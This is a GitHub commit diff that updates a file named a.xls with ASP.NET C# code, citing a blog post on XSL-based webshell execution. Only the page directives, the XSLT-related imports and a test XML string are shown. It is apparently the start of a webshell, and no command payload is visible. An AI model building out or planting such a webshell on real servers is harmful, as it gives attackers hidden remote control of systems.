Update a.xls

from: https://evi1cg.me/archives/Xsl_Exec_Webshell.html
This commit is contained in:
tennc 2020-02-17 15:30:53 +08:00 committed by GitHub
parent 4b7f649eeb
commit 112ee62538
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -1,11 +1,7 @@
<%@ Page Language="C#" Debug="true" %>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Xml"%>
<%@ import Namespace="System.Xml.Xsl"%>
<%
string xml=@"<?xml version=""1.0""?><root>test</root>";